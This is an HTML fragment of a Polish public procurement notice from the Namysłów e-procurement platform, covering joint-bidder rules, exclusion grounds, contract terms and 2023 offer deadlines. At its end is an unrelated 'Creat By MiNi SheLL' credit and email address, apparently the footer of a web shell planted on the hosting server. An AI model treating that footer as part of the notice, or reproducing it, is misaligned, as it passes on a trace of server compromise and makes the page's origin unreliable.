WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4 ustawy Pzp, z zachowaniem przepisów art. 109<br/>ust. 3, art. 110, art. 111 ustawy Pzp oraz nie może podlegać wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 3.1. SWZ<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw<br/>wykluczenia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie<br/>Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt 3.5. SWZ, przy czym dokumenty i oświadczenia, o<br/>których mowa w pkt 3.5.2 SWZ składa każdy z nich. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie<br/>zamówienia, składają oświadczenie, z którego wynika, które usługi będą wykonywać poszczególni Wykonawcy – załącznik<br/>nr 2 do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w § 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy umieścić na platformie zakupowej pod adresem: https://namyslow.ezamawiajacy.pl/app/login w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-23 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com